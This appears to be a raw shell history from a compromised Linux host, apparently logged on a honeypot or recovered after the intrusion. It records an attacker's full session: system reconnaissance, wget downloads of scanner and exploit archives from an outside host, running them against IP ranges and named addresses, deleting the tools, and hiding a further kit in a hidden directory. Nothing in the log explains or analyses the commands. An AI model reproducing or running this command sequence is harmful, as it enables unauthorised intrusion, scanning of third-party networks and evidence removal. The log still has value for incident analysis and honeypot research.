w
passwd
uname -a
cat /etc/issue
w
ls -a
ps x
pwd
top
w
pwd
ls -a
wget
wget http://www.liveshells.net/rider.tgz
tar zxvf rider.tgz
cd rider
./scan 195.31
./scan 195.32
./scan 195.33
cd
wget http://www.liveshells.net/90.tgz
tar zxvf 90.tgz
tar xvf 90.tgz
./90
wget http://www.liveshells.net/xpl.tar.tgz
wget http://www.liveshells.net/xpl.tar.tz
wget http://www.liveshells.net/xpl.tar.gz
tar xvf xpl.tar.gz
cd xpl
./n
./n
./n
./x
./n
./x
cd
ls -a
rm -rf xpl.tar.gz xpl rider.tgz 90.tgz rider 90
wget http://www.liveshells.net/x.tar.gz
w
w
w
wget www.liveshells.net/x.tar.gz
tar zxvf x.tar.gz
cd .ice-unix
PATH=:PATH bash
PATH=:PATH bash
./stealth 87.216.60.38 80
./stealth 174.168.225.104 22
exit
